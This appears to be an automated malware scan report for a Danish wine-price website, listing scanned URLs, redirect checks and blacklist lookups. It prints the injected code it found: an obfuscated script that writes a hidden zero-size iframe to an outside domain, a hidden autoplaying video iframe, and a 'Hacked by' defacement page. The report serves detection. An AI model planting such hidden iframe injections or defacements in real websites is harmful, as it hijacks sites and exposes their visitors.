Scanned pages/files
Request | Server response | Status |
http://vinprisguiden.dk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 27 Sep 2015 11:58:39 GMT Location: http://www.vinprisguiden.dk/ Server: Apache Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vinprisguiden.dk/ | 200 OK Content-Length: 5640 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below)
document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));
Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1
<iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen>
Deface/Content modification. The following signature was found: Hacked by Neo Feedback
<html> <head> <title>Hacked by Neo Feedback</title> <link rel="icon" href="https://aronno1920.files.wordpress.com/2015/07/neofeedback.png" type="image/x-icon"> <script language="JavaScript">var brzinakucanja=200;var pauzapor=2000;var vremeid=null;var kretanje=false;var poruka=new Array();var slporuka=0;var bezporuke=0;poruka[0]="Hacked by Neo Feedback" poruka[1]="Hacked by N30 F33D64CK" function prikaz(){var text=poruka[slporuka];if(bezp ...[5711 bytes skipped]...
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/javascript | clean |
http://vinprisguiden.dk/typed.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 27 Sep 2015 11:58:40 GMT Location: http://www.vinprisguiden.dk/typed.js Server: Apache Vary: Accept-Encoding Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vinprisguiden.dk/typed.js | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
http://www.vinprisguiden.dk/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vinprisguiden.dk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 27 Sep 2015 11:58:39 GMT
Location: http://www.vinprisguiden.dk/
Server: Apache
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vinprisguiden.dk
Referer: http://www.google.com/search?q=vinprisguiden.dk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vinprisguiden.dk
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vinprisguiden.dk/
Result: vinprisguiden.dk is not infected or malware details are not published yet.